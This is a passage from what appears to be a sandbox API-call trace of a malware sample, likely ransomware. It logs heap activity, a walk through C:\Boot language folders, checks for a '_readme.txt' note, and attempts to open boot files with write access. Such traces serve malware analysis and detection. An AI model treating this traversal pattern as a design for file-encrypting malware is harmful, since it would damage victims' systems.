hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.173] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.173] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.174] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.175] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.175] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.175] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0058.175] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.175] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.175] PathFindFileNameW (pszPath="") returned="" [0058.175] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.176] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.176] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.176] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.176] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0058.176] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0058.176] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.176] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.176] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.176] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0058.176] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.176] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.176] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned=".txt" [0058.177] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.177] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.177] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.177] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.177] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0058.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.177] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.177] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.177] PathFindFileNameW (pszPath="") returned="" [0058.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.177] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.177] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.177] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.177] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.178] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5da58 [0058.178] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.178] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0058.178] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.178] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.178] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.179] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.179] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.179] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned=".mui" [0058.179] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.179] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.179] PathFindExtensionW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned=".txt" [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.179] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.179] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.179] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.179] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.179] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.179] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.180] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.180] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) 